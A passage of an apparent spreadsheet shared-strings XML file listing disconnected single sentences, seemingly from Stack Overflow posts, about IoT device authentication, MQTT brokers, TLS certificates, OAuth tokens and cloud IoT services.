Also, you should note the difference in the topic space when connecting as a device and as an application.</t>
  </si>
  <si>
    <t>The token vending machine (TVM) is a server-based reference application that serves temporary credentials to remote clients to sign web requests to Amazon Web Services (AWS).</t>
  </si>
  <si>
    <t>Requesting Permissions
Each type of login flow has its own method of requesting permissions, depending on your platform and how you choose to integrate Facebook Login:
Web
The Facebook JavaScript SDK uses a scope option with the FB.login function call.</t>
  </si>
  <si>
    <t>Technically, it is not a protocol in itself; rather, it is the result of simply putting SSL/TLS between Hypertext Transfer Protocol (http) and tcp, thus adding the security capabilities of ssl/tls to standard http communications.</t>
  </si>
  <si>
    <t>When I go to verify the code, it comes up with the error message as stated in the title:
As far as I understand, the error lies on line 5, which looks like this:
The previous line ends like this:
const byte rows = 4; //four rows
What do I need to change to get the code to work?</t>
  </si>
  <si>
    <t>After I've signed in on  and validated my account; your code worked as is on Ubuntu python 2.7 and python3.3:
Check whether openssl can connect to it (ca-certificates is installed and it is not this bug):
$ openssl s_client -starttls smtp -connect smtp.live.com:587
If it is successful; you could replace smtplib.SMTP.starttls() method (in a subclass) to set appropriate ssl parameters.</t>
  </si>
  <si>
    <t>I used that user pool to create an authorizer.</t>
  </si>
  <si>
    <t>I used this to generate the cert and key.</t>
  </si>
  <si>
    <t>First thing, if you have express then you don't need https to create server.</t>
  </si>
  <si>
    <t>Which is the right Twitter Streaming API to get the tweets from the authenticating user?</t>
  </si>
  <si>
    <t>In the example from Microsoft, there is an example code for NodeJS to create a SAS token with crypto.</t>
  </si>
  <si>
    <t>When I create IoT certificates I have two (prv/pub) keys and "a cert for this thing".</t>
  </si>
  <si>
    <t>I do receive events using the IBM IoT node and API key/token instead.</t>
  </si>
  <si>
    <t>Here is a screenshot of how the API Key and Token was generated.</t>
  </si>
  <si>
    <t>I want to create a default response for nmap scans on my device.</t>
  </si>
  <si>
    <t>So certs&amp;keys will be generated after boot.</t>
  </si>
  <si>
    <t>Here's a sample that uses a cognito identity pool in JS to connect, publish and react to a subscription.</t>
  </si>
  <si>
    <t>You can check this for creating leaf certificate.</t>
  </si>
  <si>
    <t>You need some kind of configuration file for your CA certificate, otherwise it will use  which means that it creates a self signed leaf certificate rather than a CA certificate.</t>
  </si>
  <si>
    <t>I hosted Blynk server on my laptop and when i try to connect to the server form Raspberry Pi it is throwing 'SSL not authorized' error.</t>
  </si>
  <si>
    <t>Do I need to transmit the certificate chain (in addition to the device cert) when I connect?</t>
  </si>
  <si>
    <t>Any help would be appreciated in understanding why my CSR created certificate gives an error.</t>
  </si>
  <si>
    <t>I've got the following policy:
This is assigned to a certificate as well as cognito user ID and pool.</t>
  </si>
  <si>
    <t>I have been looking for explanations on how to create a NON V3 cert and couldn't find any.</t>
  </si>
  <si>
    <t>Because to be honest right now it looks to me that Win 10 IOT .NET runtime is bugged or something.</t>
  </si>
  <si>
    <t>https://social.msdn.microsoft.com/Forums/en-US/19183e82-437e-4d6f-8498-ed33ba18a3fa/creating-iot-device-with-azure-dps-via-rest?forum=azureiothub
Now If I trust on above link (However I do not think it will work ) then where is the use of certificate .PFX file ?</t>
  </si>
  <si>
    <t>For the hostnames of the devices to work across network, a device has to advertise its own hostname or just responding to DNS queries for its own hostname.</t>
  </si>
  <si>
    <t>The Host: HTTP header should not have the protocol https.</t>
  </si>
  <si>
    <t>Follow that doc, I have got the following cert files:
Please note I used New-CACertsEdgeDevice myEdgeDevice to create the device certificate.</t>
  </si>
  <si>
    <t>The Server sends a 403 Forbidden Error, if there is no User-Agent header.</t>
  </si>
  <si>
    <t>Azure IoT Hub supports three protocols: AMQP, MQTT, and HTTPs.</t>
  </si>
  <si>
    <t>Support for this is on the radar of the Azure Device Provisioning Service.</t>
  </si>
  <si>
    <t>A .NET class that provides the underlying stream of data for network access.</t>
  </si>
  <si>
    <t>UnsupportedOperationException is thrown in Java to indicate that the requested operation is not supported.</t>
  </si>
  <si>
    <t>setcookie() defines a cookie to be sent along with the rest of the HTTP headers.</t>
  </si>
  <si>
    <t>I assume I'm going to need to programmatically replicate the steps taken by the browser to get a token but I think I've tried this and it hasn't worked.</t>
  </si>
  <si>
    <t>My C Code for Wifi shield on Arduino Mega 2560 should read out sensor data and make a HTTP request.</t>
  </si>
  <si>
    <t>Is it possible to detect when a client is connected without the client having sent any characters?</t>
  </si>
  <si>
    <t>Lately, I somehow get a strange error message:
In constructor 
error: cannot convert 'char*' to 'const WCHAR*' for argument '1' to 'void* CreateFileW(const WCHAR*, DWORD, DWORD, _SECURITY_ATTRIBUTES*, DWORD, DWORD, void*)'
I don't get that message.</t>
  </si>
  <si>
    <t>However, I still see a blank page and Uncaught SyntaxError: Unexpected token &lt; on console.</t>
  </si>
  <si>
    <t>cert.pem, privateKey.pem)
Set server certificate which is root certificate .pem file path (e.g.</t>
  </si>
  <si>
    <t>set-date.ps1 file content:
I'm trying to find other way to do it or try to run ProcessLauncher inside impersonator, but i don't know how to do it on uwp.</t>
  </si>
  <si>
    <t>I've added the NOPASSWD directives after the %admin and %sudo lines just as other posts have suggested.</t>
  </si>
  <si>
    <t>I have tried authenticating by passing the token to the custom API like this.</t>
  </si>
  <si>
    <t>The Etag header is returned in all requests scoped to a single device identity, as per RFC7232 .</t>
  </si>
  <si>
    <t>When i press the activation button in openHAB to publish BLINDSUP or BLINDSDOWN the messages arrives without any problems and i can see the message on my mosquitto terminal.</t>
  </si>
  <si>
    <t>Currently, i have an ethernet shield connected to arduino, and i'm using the HTTP request with the private IP address of the arduino board, and everything is fine.</t>
  </si>
  <si>
    <t>But my ESP8266 module is creating the hotspot before sending /fupdate **request or authorization.</t>
  </si>
  <si>
    <t>I managed to make it work in http but I want to have https enabled.</t>
  </si>
  <si>
    <t>Is it possible to get notified that a device has connected to IoT hub without polling?</t>
  </si>
  <si>
    <t>The topic is not valid: use-token-auth 
The topic does not match an allowed rule    07.02.2017 11:45:36
Thanks in advance for any help to get this working.</t>
  </si>
  <si>
    <t>I am testing an API I have made using Springboot from my laptop (192.168.1.217:8080) and I am trying to get a cURL request via SSH from my Raspberry Pi.</t>
  </si>
  <si>
    <t>Facebook login is working now, thanks to firebase, but it would be nice if the url were http://myUrl:4990 instead of http://10.10.10.1:4990</t>
  </si>
  <si>
    <t>I am able to connect to aws iot with these temporary security credentials but unable to publish or subscribe.</t>
  </si>
  <si>
    <t>The 3 files, rootca.pem, certificate.pem.crt, private.pem.key are in the same folder as the python file above.</t>
  </si>
  <si>
    <t>When the User is successfully authenticated, he needs to get a Identity to access other AWS Services.</t>
  </si>
  <si>
    <t>This is the Error Message:
Error retrieving credentials: NotAuthorizedException: Access to
  Identity 'eu-central-1:XXXXXXXXXX' is
  forbidden.</t>
  </si>
  <si>
    <t>I want my backend to be able to directly send messages to authenticated users.</t>
  </si>
  <si>
    <t>I am not able to retrieve content, although request is legitimate and correct.</t>
  </si>
  <si>
    <t>I've simply shoved it all into a Git repo, which can be found here:
https://github.com/Hermanoid/UltimateLED2
I have a couple asides to ask about as well...  For one, I neglected to bleep out the Device Key and ID of my Raspberry Pi in the repo.</t>
  </si>
  <si>
    <t>I want to send 3 different commands to 1 gateway on 3 different topics, like 
My gateway is registered in iot-hub and I use it at {deviceid}.</t>
  </si>
  <si>
    <t>I have an IoT device that is set up and running via MQTT server with following parameters: hostname, port, clientId, username, password etc.</t>
  </si>
  <si>
    <t>Code below: 
Here is part of the InnerException:
System.IO.IOException: The encryption operation failed, see inner exception.</t>
  </si>
  <si>
    <t>The chain (CA) certificate files were uploaded under 'Certificates' in IoT Hub with status 'Verified'.</t>
  </si>
  <si>
    <t>When this runs, I get the following exception
Where "DeviceId" is the value obscured in red.</t>
  </si>
  <si>
    <t>However, when I set up X.509 certificates for the edge hub, I've been getting module authentication errors as follows.</t>
  </si>
  <si>
    <t>I am getting this error Runtime error:Failed to add edge detection.</t>
  </si>
  <si>
    <t>When ran I get an error on line  with the error of OSError: An attempt was made to access a socket in a way forbidden by its access permissions.</t>
  </si>
  <si>
    <t>If I call Networks again with wrong credentials, the "Could not get any response" message appears just after 1-2 sec now.</t>
  </si>
  <si>
    <t>What I noticed, is that if I remove WiFi.begin(ssid.c_str(), password.c_str()); line, I never get "no response" message.</t>
  </si>
  <si>
    <t>For example if the Insert statement failed with Foreign key exception, i would like to send this message.</t>
  </si>
  <si>
    <t>I have tried adding roots.pem certificate but it throws an error that file is too big.</t>
  </si>
  <si>
    <t>Here is what I am doing:
First, I set up a Cognito User Pool with a couple of users who have a username and password to login.</t>
  </si>
  <si>
    <t>It's able to authenticate but failing to load policy agreement.</t>
  </si>
  <si>
    <t>The Arduino computes digest of message, checks it, validates data, and then acts on message.</t>
  </si>
  <si>
    <t>Authenticating a User Timeline for Twitter OAuth API V1.1 &gt; http://www.webdevdoor.com/php/authenticating-twitter-feed-timeline-oauth/</t>
  </si>
  <si>
    <t>Helps to ensure new code stability
For more info try
And an excellent article by Dianne Hackborn</t>
  </si>
  <si>
    <t>Because it's master which should decide when to request values and properly decode the request.</t>
  </si>
  <si>
    <t>When I tried to connect to the Telnet server using nodeJs sockets, I thought I was going to get a string requesting the username.</t>
  </si>
  <si>
    <t>As posted in the comments: Sounds like the sofware to which the request shall be proxied is not running, check if the piui-supervisor is running.</t>
  </si>
  <si>
    <t>See http://php.net/manual/en/features.http-auth.php</t>
  </si>
  <si>
    <t>token error
  message
Once you have the data declared correctly these errors will be solved.</t>
  </si>
  <si>
    <t>You can ssh to it, then ssh from it to the slave nodes (if need be), but the head node is the only one that gets out to the rest of the world.</t>
  </si>
  <si>
    <t>Make sure the device has been detected as described here (for Windows): https://stackoverflow.com/a/26913070/3361975</t>
  </si>
  <si>
    <t>For example the value 0x02 reads Allow Scan Request from Any, Allow Connect Request from White List Only.</t>
  </si>
  <si>
    <t>You are trying to forward CONNECT/HTTPS request hitting on port 443 to an intercepted http_port.</t>
  </si>
  <si>
    <t>Upon receiving the message, parse it and verify (authenticate etc.)</t>
  </si>
  <si>
    <t>Unix domain sockets are probably the best choice but if you want to chroot() the Java application, a TCP/IP socket might be needed.</t>
  </si>
  <si>
    <t>Add some HTTP Basic Auth and the job is done,</t>
  </si>
  <si>
    <t>Check out Authentication Database and make sure that your client is authenticating using such database.</t>
  </si>
  <si>
    <t>One simple way to debug this is to use the iothubowner policy and associated key since it has full permissions.</t>
  </si>
  <si>
    <t>Try the following...
https://github.com/pyca/cryptography/issues/2853</t>
  </si>
  <si>
    <t>Please take a look at the sections in https://azure.microsoft.com/documentation/articles/iot-hub-sas-tokens/ that discuss using X.509 certificates with IoT Hub.</t>
  </si>
  <si>
    <t>unsubscribe function
   This function can be used to unsubscribe from a previously subscribed topic.</t>
  </si>
  <si>
    <t>You can authorize another (Work account) for Power BI from the Azure portal when you are signed in to your Azure subscription with a Microsoft account.</t>
  </si>
  <si>
    <t>Otherwise, you'll have to include shape information in your message, to be decoded in the client.</t>
  </si>
  <si>
    <t>For unauthenticated cognito identities the "Identity pool anauthenticated" role is sufficient to allow connecting to the IoT MQTT broker.</t>
  </si>
  <si>
    <t>MQTT clients get clientID as parameter before connection to provide uniqueness.</t>
  </si>
  <si>
    <t>Normally, the proxy server was configured for working on HTTP protocol which only allow the HTTP communication.</t>
  </si>
  <si>
    <t>If you have two devices connecting with the same clientId and credentials  that leads to the clientId stealing.</t>
  </si>
  <si>
    <t>When it comes to authenticating devices, IoT Hub offers several options that are detailed here.</t>
  </si>
  <si>
    <t>You can try  or sudo -u to the MySQL user and running ls -la /var/www/transfer/; if you don't see anything then you know the issue has to do with permissions of the folder and/or its contents.</t>
  </si>
  <si>
    <t>That means, QoS guarantees can get downgraded for a particular receiving client if subscribed with a lower QoS.</t>
  </si>
  <si>
    <t>This key allows sending FCM messages on your behalf, so should only be used on environments you trust.</t>
  </si>
  <si>
    <t>In that case you could use the standard OAuth server provided by Google: 
https://accounts.google.com/o/oauth2/v2/auth
https://www.googleapis.com/oauth2/v4/token</t>
  </si>
  <si>
    <t>The iot:Receive permission is checked every time a message is delivered to a client.</t>
  </si>
  <si>
    <t>The ASA will send a validation message to your AF and its response status should be 20x code.</t>
  </si>
  <si>
    <t>This will not work as every client needs a unique id and the broker will disconnect duplicates.</t>
  </si>
  <si>
    <t>Then you may be able to use that token to get the access token for the user and make API calls.</t>
  </si>
  <si>
    <t>Device SDKs typically use MQTT and x509 certificates for authentication to AWS IOT but you can communicate over https as well.</t>
  </si>
  <si>
    <t>To connect Azure IoT Hub, the device(software client) need select either Secuity Keys(related to Tokens) or x509(certificate) as authentication method.</t>
  </si>
  <si>
    <t>As for Device Provisioning Service, you need select x509 or TPM-based identity to provision device.</t>
  </si>
  <si>
    <t>Both X.509 certificates and SAS tokens can be stored in Hardware security module, so you don't have to preprogrammed with a SAS, token, or other unique identifier in your device client.</t>
  </si>
  <si>
    <t>Or you could also try to test your request with OAuth for Apps: Windows Samples.</t>
  </si>
  <si>
    <t>https://www.espressif.com/sites/default/files/documentation/5a-esp8266_sdk_ssl_user_manual_en.pdf
Also, try TLS 1.1 to see what it does.</t>
  </si>
  <si>
    <t>You'll also need an AWS IoT policy for your Cognito identity in addition to the policy you've attached to the IAM Role.</t>
  </si>
  <si>
    <t>You will have to attach a valid policy which allows you to call the  API on the service.</t>
  </si>
  <si>
    <t>The v1 API for HTTP uses a short-lived OAuth2.0 access token that's generated for a service account.</t>
  </si>
  <si>
    <t>In addition to this, you'll need a library to encode a JWT (Json Web Token) for the auth side of things.</t>
  </si>
  <si>
    <t>Sorry for late response.The registry key seems to be working for me just fine but you need to add the registry key with DefaultAccount.</t>
  </si>
  <si>
    <t>This DevNonce is used to derive the NwkSKey and AppSKey session keys from the Join Accept response.</t>
  </si>
  <si>
    <t>You got to use the complete path (see https://www.tutorialspoint.com/python/os_chdir.htm)
Try something like 
If you want to change file permissions in your code, use os.getcwd() (see https://www.tutorialspoint.com/python/os_chown.htm).</t>
  </si>
  <si>
    <t>Though my IoT policy had all the required permissions, the auth role corresponding to the identity pool did not.</t>
  </si>
  <si>
    <t>Though these root certificates are long-lived, they still may expire or be revoked.</t>
  </si>
  <si>
    <t>The leaf devices are validated starting with the intermediate CA, which is chained up through to your root CA.</t>
  </si>
  <si>
    <t>Here is the rest API to upload the certificate to the IoT hub.</t>
  </si>
  <si>
    <t>The short answer is no, you cannot change the IoT hub server's certificates.</t>
  </si>
  <si>
    <t>The only thing that intermediate cert has is information about the cert that signed it, nothing more.</t>
  </si>
  <si>
    <t>The
  iot:Receive permission is checked every time a message is delivered to
  a client.</t>
  </si>
  <si>
    <t>Client to server messages must be masked so the top bit is set.</t>
  </si>
  <si>
    <t>The HTML nonce attribute is used as part of Content Security Policy feature in browsers.</t>
  </si>
  <si>
    <t>The HTTP response status code 407 Proxy Authentication Required</t>
  </si>
  <si>
    <t>Apache module which provides access control based on client hostname, IP address, or other characteristics of the client request.</t>
  </si>
  <si>
    <t>It is used to establish master-slave/client-server communication between intelligent devices.</t>
  </si>
  <si>
    <t>Certbot is the official client used to issue Let's Encrypt SSL certificates.</t>
  </si>
  <si>
    <t>Transport Layer Security version 1.0 - formerly an upgrade of SSL Version 3.0</t>
  </si>
  <si>
    <t>VRPN allows to communicate applications (clients) with hardware peripherals (servers) across the network in a transparent way.</t>
  </si>
  <si>
    <t>The SNI headers indicates which host is the client trying to connect as, allowing the server to return the appropriate digital certificate to the client.</t>
  </si>
  <si>
    <t>EntityDataSource is an ASP.NET web server control available in .NET Framework 3.5 SP1 or later.</t>
  </si>
  <si>
    <t>Access Token is the last token acquired during the OAuth authentication process.</t>
  </si>
  <si>
    <t>In conjunction with ssl-certificate, they allow clients to identify during TLS handshake, thus ensuring two-way authentication.</t>
  </si>
  <si>
    <t>Content Security Policy 1.1
A working draft for the precise specifications of CSP.</t>
  </si>
  <si>
    <t>http://www.securityworldmag.com/data_file/product/HID%20CARD.jpg</t>
  </si>
  <si>
    <t>If you use a cast, and the nullable value type is currently undefined, an InvalidOperationException exception will be thrown.</t>
  </si>
  <si>
    <t>HTTP access authentication is explained in "HTTP Authentication: Basic and Digest Access Authentication".</t>
  </si>
  <si>
    <t>Apigee Edge
Think of this as a transparent HTTP proxy server for API calls.</t>
  </si>
  <si>
    <t>It supports TSIG authenticated messages, partial DNSSEC verification, and EDNS0.</t>
  </si>
  <si>
    <t>SSH.NET is an open-source, standalone implementation of the SSH-2 protocol, written in .net-4.0.</t>
  </si>
  <si>
    <t>Widevine is a google company which provides a platform for delivering protected content and defend the copyright of the content.</t>
  </si>
  <si>
    <t>The exception thrown when an attempt is made to access a file that does not exist.</t>
  </si>
  <si>
    <t>If your application is marked version 4.0, you can use message-identifier
values in the range 0x8000 (WM_APP) through 0xBFFF for private
messages.</t>
  </si>
  <si>
    <t>These tokens are needed for user connections, so developers should pass them to clients.</t>
  </si>
  <si>
    <t>Identity information for authorized user are transferred through the ID Token.</t>
  </si>
  <si>
    <t>Encryption does not of itself prevent interception, but denies the message content to the interceptor.</t>
  </si>
  <si>
    <t>BungeeCord is one library / software for proxying minecraft servers behind a seemingly single gateway.</t>
  </si>
  <si>
    <t>gcloud is configured to access Google Cloud Platform services and authorize (OAuth 2.0) automatically on your behalf.</t>
  </si>
  <si>
    <t>In particular I want easy integration with IdentityServer reference and bearer tokens.</t>
  </si>
  <si>
    <t>Applications
It has the client role in the OAuth 2.0 architecture and will request protected user data.</t>
  </si>
  <si>
    <t>From the docs:
You can use ACM to manage SSL/TLS certificates for your AWS-based websites and applications.</t>
  </si>
  <si>
    <t>For client authentication with HttpWebRequest, the client certificate must be installed in the My certificate store of the current user.</t>
  </si>
  <si>
    <t>See 
401 UNAUTHORIZED
List of HTTP status codes (Wikipedia)</t>
  </si>
  <si>
    <t>A popular edge detection algorithm is the Canny edge detector.</t>
  </si>
  <si>
    <t>jsonp: A string overriding the callback function in a jsonp request
jsonpCallback: Specifies a name for the callback function in a jsonp request
password: Specifies a password to be used in an HTTP access authentication request.</t>
  </si>
  <si>
    <t>Using Metalink's chunk checksums, aria2 automatically validates chunks of data while downloading a file like BitTorrent.</t>
  </si>
  <si>
    <t>So how can i register device using SharedAccessKeyName=device so that I can use same connection string to send messages to iot hub device.</t>
  </si>
  <si>
    <t>https://docs.internetofthings.ibmcloud.com/swagger/v0002.html#!/Bulk_Operations/post_bulk_devices_add
Also, this recipe describes how to register multiple IoT devices.</t>
  </si>
  <si>
    <t>The IAM role assigned to each of these groups can be the role with your locked down IoT policy.</t>
  </si>
  <si>
    <t>Your application code then would handle the case in which a user try to register more than once a day, displaying an error message</t>
  </si>
  <si>
    <t>3) Verify the cert file referenced in EdgeModuleCACertificateFile exists and looks like a valid PEM file (e.g.</t>
  </si>
  <si>
    <t>Here's an article which shows an example of implementing a Spring boot application that is able to authenticate the user against Amazon Cognito using OAuth 2.0 authorization code grant and JSON Web Tokens.</t>
  </si>
  <si>
    <t>Normally Certificate based authorization is used only for authorisation on MQTT-Broker side.</t>
  </si>
  <si>
    <t>I think I have to use the same BearSSL format for the certs&amp;keys that I got from the JSON response and should plan for secure MQTT connection with AWS endpoint:(port).</t>
  </si>
  <si>
    <t>Use 
Dashboard -&gt; Apps -&gt; Generate Key
to create a pair of API key and token.</t>
  </si>
  <si>
    <t>Example
Authenticated Encryption
Create a keyset:
Create a key:
In code:
crypter = keyczar.Crypter.Read("path/to/key/set")
ciphertext = crypter.Encrypt("my secret")
plaintext = crypter.Decrypt(ciphertext)
See more Examples on the Keyczar Wiki.</t>
  </si>
  <si>
    <t>Sometimes this error is also produced if the client fails to send a (valid) HTTP Version.</t>
  </si>
  <si>
    <t>So the other plan is to use Javascript to detect when the key is pressed with the keydown event something like this 
http://jsfiddle.net/LjGRe/ but the problem here is that I dont know how to send the variable from javascript to python.</t>
  </si>
  <si>
    <t>https://192.168.56.235:9446/carbon url is intentionally blocked in the IoTS 3.0.0, This port belongs to mqtt broker and there is no UI capability for this.</t>
  </si>
  <si>
    <t>I tried:
removing parts of the application
enabling breaking on all exceptions
combining multiple events coming from the BLE device to prevent flooding the application with events.</t>
  </si>
  <si>
    <t>iOS open source library used to tests apps with fake network data and custom response time, response code and headers</t>
  </si>
  <si>
    <t>You can view the  from Azure Portal:
az iot hub certificate generate-verification-code --hub-name &lt;azure-iot-hub-name&gt; --name &lt;certificate name&gt; --etag &lt;ETag&gt;
After executed successfully,you will get the response from Azure including the verificationCode, according with this code, generate the verification certificate file.</t>
  </si>
  <si>
    <t>defaults to false
gzip Try to serve the gzipped version of a file automatically when
gzip is ---supported by a client and if the requested file with .gz
extension exists.</t>
  </si>
  <si>
    <t>From my understanding, I need to modify the Appearance characteric of the Generic Access Profile (https://www.bluetooth.com/specifications/assigned-numbers/generic-access-profile), but I'm stuck as it does not exit, and if try to create it, it fails with a  status=133 error.</t>
  </si>
  <si>
    <t>I tried to initially set the FPS and calculate it on my own but i get this exception:
An unhandled exception of type 'System.AccessViolationException'
  occurred in System.Private.CoreLib.ni.dll Attempted to read or write
  protected memory.</t>
  </si>
  <si>
    <t>Now I want to try to use POST with signatyure version 4
I'm using postmand to send a POST request, but I got this output:
In authorization fields I have chosen "AWS Signature" and I have completed all of them: access and secret key, aws region and service name=iotdata
I want to get the same results as when I use the curl command:</t>
  </si>
  <si>
    <t>Features:
Supports OAuth 1.0/a, 2.0 and Ofly
Service wrappers for convenient connection initialization
Authenticated session objects providing nifty things like keep-alive
Well tested (100% coverage)
Built on Requests (v1.x)</t>
  </si>
  <si>
    <t>If you receive a message, whose signature can be validated using the public key, then you know that the message could only have been signed using the private key stored on the smartcard, which means that the message came from someone having physical possession of the smartcard and who knows the PIN or passcode required to use the smartcard.</t>
  </si>
  <si>
    <t>Security Token Service: A web service where a user (or client software)
presents some form of credentials (e.g., username/password), and if valid
the result is a 'security token' that can be used to access a web
application or web service.</t>
  </si>
  <si>
    <t>Danny Tuppeny provides a great start with a simple script you can run on his blog posting Installing Lighttpd, PHP 7 and LetsEncrypt on a Raspberry Pi (Raspbian Jessie Lite)
A more generalized version based on the latest Lets Encrypt script package can be found in my Gist: letsencrypt-update-lighttpd.</t>
  </si>
  <si>
    <t>QoS is a major feature of MQTT, it makes communication in unreliable networks a lot easier because the protocol handles retransmission and guarantees the delivery of the message, regardless how unreliable the underlying transport is.</t>
  </si>
  <si>
    <t>This class provides the option to setup various configuration options when making HTTP requests, allowing control over headers, cookies, credentials, protocols, proxies and many others.</t>
  </si>
  <si>
    <t>Source: http://en.wikipedia.org/wiki/Branch_predictor
The Spectre security vulnerability revolves around branch prediction:
https://en.wikipedia.org/wiki/Spectre_(security_vulnerability)
The inner workings of Spectre (v2)
Other resources
Special-purpose predictors: Return Address Stack for call/ret.</t>
  </si>
  <si>
    <t>There are a few workarounds though, either you use another broker without encryption on one side (connected to the arduino) and then encryption on the other end (connected to the public broker).</t>
  </si>
  <si>
    <t>GZipStream is a .NET 2.0+ class for compression and decompression using gzip format., while including a redundancy check value for detecting data corruption.</t>
  </si>
  <si>
    <t>You can very easily create your own signed SSL certificate and use that to host your page via Https.In tomcat server.xml you just have to un-comment the ssl connector and point to the location of your certificate.</t>
  </si>
  <si>
    <t>SPNEGO (Simple and Protected GSSAPI Negotiation Mechanism) is used when a client application wants to authenticate to a remote server, but neither end is sure what authentication protocols the other supports.</t>
  </si>
  <si>
    <t>Your second approach such as using a ServiceBus namespace and sas token for authorization is working well for any public Event Hub entity, but not for internal Event Hub of the IoT Hub.</t>
  </si>
  <si>
    <t>The alert is sent to the tty where the recipient is logged in, and contains the Subject, From line, and first few lines of the body of the new message.</t>
  </si>
  <si>
    <t>JWS and JWE use JSON and base64url encoding to secure messages in a (relatively) simple, compact and web safe format while JWK defines a JSON representation of cryptographic keys.</t>
  </si>
  <si>
    <t>My Cognito authorised role in IAM has a policy of "AWSIoTFullAccess" attached to it so I am confused as to why these credentials return a 403 error each time.</t>
  </si>
  <si>
    <t>However, a self-signed certificate is been used for SSL communication, In order to have a valid certificate, you might need to create a new certificate with a trusted CA.</t>
  </si>
  <si>
    <t>You can Install it through this command :-   
Code for Invalid Ip address of generating Pop Up is as follow:-
Hope this Helpful !</t>
  </si>
  <si>
    <t>utf-8 (people sometimes only write UTF for this encoding), can encode all valid and invalid sequences in the other encodings, as well as being an ascii superset.</t>
  </si>
  <si>
    <t>I used fiddler2 to sniff the http packets when I login in using chrome and am trying to use the information from that http post to recreate my own post to login.</t>
  </si>
  <si>
    <t>I want to make a time-lapse so I have this script:
wget -O [filenamepath] http://192.168.1.110:8080/snapshot.cgi?user=user&amp;pwd=1234&amp;count=3
And I get a 401 Unauthorized error in the console.</t>
  </si>
  <si>
    <t>$ transmission-remote --auth myusername:mypassword
which succeeded, but it's still throwing the same "Unexpected response" error for all other commands.</t>
  </si>
  <si>
    <t>So i want to understand it how it work and what we need to do if we want to implement SSL security.This question explain much about SSl and how does it happen.</t>
  </si>
  <si>
    <t>In same way as port 8080 is bound :
Reason I'm asking this is that I'm unable to connect workers to master node and I think the issue is that the master ip is not discoverable.</t>
  </si>
  <si>
    <t>[A buzzer system communicating to a Jeopardy!-esque game frontend] To goal is to have the 'lockout' event emit.</t>
  </si>
  <si>
    <t>But when i add a new device on registry :
I get an exception with this message :
ErrorCode:InvalidProtocolVersion;Invalid protocol version:2016-04-30
Any point in the right direction would be greatly appreciated.</t>
  </si>
  <si>
    <t>I've also tried NOT attaching the certificate to the UWP HttpClient and the app prompts me with a UI to select an installed certificate.</t>
  </si>
  <si>
    <t>In additon, I hit the GET on the web service from a browser, select the client cert when prompted, and am able to download a file.</t>
  </si>
  <si>
    <t>Problem is, the Rails application doesn't seem to manage to handle https requests.</t>
  </si>
  <si>
    <t>As long as I allow anonymous connections on , I can access the broker (pub &amp; sub) without any problems.</t>
  </si>
  <si>
    <t>1488542162: OpenSSL Error: error:140940E5:SSL routines:SSL3_READ_BYTES:ssl handshake failure
1488542162: Socket error on client &lt;unknown&gt;, disconnecting.</t>
  </si>
  <si>
    <t>3- how would I stop anyone from send a fake post request to my server and populate my database?</t>
  </si>
  <si>
    <t xml:space="preserve">
keypad_til_rele:37: error: expected unqualified-id before '{' token
{
^
exit status 1
expected unqualified-id before '{' token
Where is the error ?</t>
  </si>
  <si>
    <t>Is there another way I should be doing this like using a token based authentication which will allow the device to post their data while at the same time keeping my API secure?</t>
  </si>
  <si>
    <t>The Problem is, the data received after the connection had be cut off and reestablished is corrupted
Server Code "Receiver":
and this is the client "Sender"</t>
  </si>
  <si>
    <t>Later we thought of having local network solution within our organization for that, We set up rabbitmq for MQTT broker for serverhttps://www.rabbitmq.com/ssl.html#keys-and-certs.</t>
  </si>
  <si>
    <t>Following situation: 
our gateways have a TPM and we are going to provision it with per device certificates (issued by our PKI).</t>
  </si>
  <si>
    <t>I'm following https://github.com/aws/aws-iot-device-sdk-js
I checked with some static credential with a aws user like:
And this works fine.</t>
  </si>
  <si>
    <t>I enabled CORS, in POST method execution I added Authorization.</t>
  </si>
  <si>
    <t>I/ProgramBinary/Service: ProgramBinaryService client side disable binary content debugging.</t>
  </si>
  <si>
    <t>As far as I understand:
my IoT Edge has to register each device on the IoT Hub this way each
A device will be represented on my hub and we will be able to send
message via its ID directly.</t>
  </si>
  <si>
    <t>1520115632: OpenSSL Error: error:1417C0C7:SSL routines:tls_process_client_certificate:peer did not return a certificate
1520115632: Socket error on client &lt;unknown&gt;, disconnecting.</t>
  </si>
  <si>
    <t>1520115637: OpenSSL Error: error:1417C0C7:SSL routines:tls_process_client_certificate:peer did not return a certificate
1520115637: Socket error on client &lt;unknown&gt;, disconnecting.</t>
  </si>
  <si>
    <t>(developer error)", e);
        } catch (IOException e) {
            throw new IllegalStateException("Cannot read private key file.</t>
  </si>
  <si>
    <t>I need to get a list of the IAM policies attached to an AWS IoT Thing's certificate, in way that is script/automation-friendly.</t>
  </si>
  <si>
    <t>I would like to know if there are any way to connect in the same way of Google IoT (JWT in the password field) o Azure (SAS token in password field) and not have to use the files: private key, CA certificate, certificate x509
The deviced I'm using are MQTT, so I can not use HTTP or similar</t>
  </si>
  <si>
    <t>what I want to do is to stream the footage of the security camera to the main hub so that it can process the images.</t>
  </si>
  <si>
    <t>code-oss
E: There were unauthenticated packages and -y was used without --allow-unauthenticated
I've tried to install it by using root but the same message popped up.</t>
  </si>
  <si>
    <t>curl -k -X POST "https://172.16.13.86:8243/raspberrypi/1.0.0/device/us310v497by0/bulb?state=on" -H "accept: application/json" -H "Authorization: Bearer 739e2223-62b6-3a24-890f-5b6e610ed6d2"
Now I want to get the current temperature which is detected by the dht11 sensor.</t>
  </si>
  <si>
    <t>I want this raspberry pi based slave to populate and send a response to master when ever master requests for a register value.</t>
  </si>
  <si>
    <t>I am registering all devices as one but is it possible to send device info as part of the message being published.</t>
  </si>
  <si>
    <t>There are a bunch of options you can tweak: FreeRTOS or bare SDK, private exception/breakpoint stack, console redirection to GDB, wait till debugger attachment etc.</t>
  </si>
  <si>
    <t>However, even though I'm generating the signed URL using an IAM role that has the AWSIoTFullAccess policy attached to it (and thus should have access to all IoT operations on all resources!</t>
  </si>
  <si>
    <t>The first step for the API communication is to get access token using the POST method.</t>
  </si>
  <si>
    <t>Is there a way to achieve this with MQTT, web sockets or any other secure method?</t>
  </si>
  <si>
    <t xml:space="preserve">
I want to make a program to send messages to BotTelegram, in my codec
  I use WifiClientSecure to do HTTPS requests, I know there is a
  Telegram bot lib for ESP8266, but I don't want to use it for a reason.</t>
  </si>
  <si>
    <t>/////
azure-sdk-c 
OS:linux
////////
I placed my self signed public certificate and private key in hsm_client_riot.c to provision.</t>
  </si>
  <si>
    <t>HTTP Status : 500 
  Invalid signature found in the SAML response.</t>
  </si>
  <si>
    <t>It seems to me all examples I found are device collecting info and send to iot hub.</t>
  </si>
  <si>
